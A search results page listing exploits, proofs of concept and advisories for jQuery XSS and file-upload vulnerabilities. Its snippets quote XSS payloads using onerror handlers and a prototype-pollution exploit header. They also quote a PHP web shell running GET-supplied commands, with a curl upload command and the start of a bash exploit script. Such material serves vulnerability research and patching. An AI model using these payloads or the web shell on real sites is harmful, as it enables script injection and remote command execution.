Exploit-DB
exploit-db.com › exploits › 52141
jQuery 3.3.1 - Prototype Pollution & XSS Exploit - Multiple webapps Exploit
April 8, 2025 - # # Usage: # 1. Load this script in a page that includes jQuery 3.3.1 # 2. Observe two XSS alerts via script injection and prototype pollution. # PoC (Proof of Concept): # ------------------------------------ /* * Exploit for CVE-2020-7656 and CVE-2019-11358 * Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X */ COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12) // 1.
Exploit-DB
exploit-db.com › exploits › 49767
jQuery 1.0.3 - Cross-Site Scripting (XSS) - Multiple webapps Exploit
April 14, 2021 - # Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS) # Date: 04/29/2020 # Exploit Author: Central InfoSec # Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0 # CVE : CVE-2020-11023 # Proof of Concept 1: <style><style /><img src=x onerror=alert(1)> # Proof of Concept 2 (Only jQuery 3.x affected): <img alt="<x" title="/><img src=x onerror=alert(1)>">
Videos
24:16
DOM XSS in jQuery Selector Sink - YouTube
22:49
DOM XSS in jQuery Selector Sink using a Hashchange Event - YouTube
10:47
XSS - Exploiting Vulnerable JQuery Sink - YouTube
Video
00:49
Proof of Concept: CVE-2018-9206 jQuery File Upload RCE - YouTube
05:23
10/25/18 JQuery File Upload Vulnerability | AT&T ThreatTraq - YouTube
Exploit-DB
exploit-db.com › exploits › 49766
jQuery 1.2 - Cross-Site Scripting (XSS) - Multiple webapps Exploit
April 14, 2021 - # Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS) # Date: 04/29/2020 # Exploit Author: Central InfoSec # Version: jQuery versions greater than or equal to 1.2 and before 3.5.0 # CVE : CVE-2020-11022 # Proof of Concept 1: <option><style></option></select><img src=x onerror=alert(1)></style>
GitHub
github.com › hackgiver › CVE-2015-9251
GitHub - hackgiver/CVE-2015-9251: This repository contains a Proof of Concept (PoC) for CVE-2015-9251, a vulnerability in jQuery versions prior to 3.0.0 that allows attackers to perform Cross-Site Scripting (XSS) attacks under certain conditions. · GitHub
This repository contains a Proof of Concept (PoC) for CVE-2015-9251, a vulnerability in jQuery versions prior to 3.0.0 that allows attackers to perform Cross-Site Scripting (XSS) attacks under cert...
Author hackgiver
Cybersecurity Help
cybersecurity-help.cz › vdb › SB2020052520
SB2020052520 - Cross-site scripting in jQuery
Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks. PoC: index.html: <html> <head> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery...
Vulnerabledoma
vulnerabledoma.in › jquery_htmlPrefilter_xss.html
jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)
PoCs of XSS bugs fixed in jQuery 3.5.0.
GitHub
github.com › cve-sandbox › jquery › blob › main › CVE-2020-11023 › index.html
jquery/CVE-2020-11023/index.html at main · cve-sandbox/jquery
Version: jQuery >= 1.5.1 < 3.5.0 · POC Author: https://twitter.com/therceman · Credits: https://twitter.com/kinugawamasato · --> · <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> · <!-- ---------------------- POC (version: >= 1.5.1 < 3.5.0) --------------------------------- XSS payload is injected into the .html(), .append(), $() using prepended <option> tag ·
Author cve-sandbox
GitHub
github.com › cve-sandbox › jquery-ui › blob › main › CVE-2022-31160 › index.html
jquery-ui/CVE-2022-31160/index.html at main · cve-sandbox/jquery-ui
Version: jQuery UI < 1.13.2 · ------------------------------------------------------------------------------------ The XSS payload is injected into the <label> tag element with URL-encoded characters · Payload is decoded to HTML and XSS is triggered when specific JS code is executed · ------------------------------------------------------------------------------------ POC Author: https://twitter.com/therceman ·
Author cve-sandbox
Exploit-DB
exploit-db.com › exploits › 45584
jQuery-File-Upload 9.22.0 - Arbitrary File Upload - PHP webapps Exploit
October 11, 2018 - # shell.php: <?php $cmd=$_GET['cmd']; system($cmd);?> # Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php #!/bin/bash USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php") MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php" # What is added in this exploit from the original version # - a bit of refactoring # - automatically request the right filename if it already exist
TrustedSec
trustedsec.com › home › blog › everything you need to know about jquery and its vulnerabilities
TrustedSec | Everything You Need to Know About jQuery and its…
March 19, 2025 - In summary, in order to exploit jQuery to the point where you can run your own JavaScript code, you must have control of a parameter that is being passed into one of the identified vulnerable functions.
Price $
Address 3485 Southwestern Boulevard, 44333, Fairlawn
GitHub
github.com › 0xAJ2K › CVE-2020-11022-CVE-2020-11023
GitHub - 0xAJ2K/CVE-2020-11022-CVE-2020-11023: Little thing put together quickly to demonstrate this CVE · GitHub
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.
Starred by 35 users
Forked by 4 users
Languages PHP
JQuery
bugs.jquery.com › ticket › 9521
#9521 (XSS with $(location.hash) and $(#<tag>) is needed?) - jQuery - Bug Tracker
I wrote about it a few months ago here and dubbed it "jQuery Selector Injection": http://www.mjcblog.net/2011/06/jquery-selector-injection · As you likely know, the potential for XSS is still present if the selector is not #id based. See my second PoC at the end of that blog post. My post just tired to emphasize the need, as a developer, to be mindful of user-input and security considerations. It did not suggest any solutions. ... We've done the best we can do with a generic solution for the very common but unwise case of $(location.hash). Other exploits are possible but not as widespread.
GitHub
github.com › advisories › GHSA-h6gj-6jjq-h8g9
jQuery UI vulnerable to XSS when refreshing a checkboxradio with an HTML-like initial text label · CVE-2022-31160 · GitHub Advisory Database · GitHub
July 15, 2022 - The bug has been patched in jQuery UI 1.13.2.
Tenable
tenable.com › plugins › was › 112435
jQuery 1.12.4 < 3.0.0 Cross-Site Scripting<!-- --> | Tenable®
According to its self-reported version number, jQuery is at least 1.4.0 and prior to 1.12.0 or at least 1.12.4 and prior to 3.0.0-beta1. Therefore, it may be affected by a cross-site scripting vulnerability due to cross-domain ajax request performed without the dataType.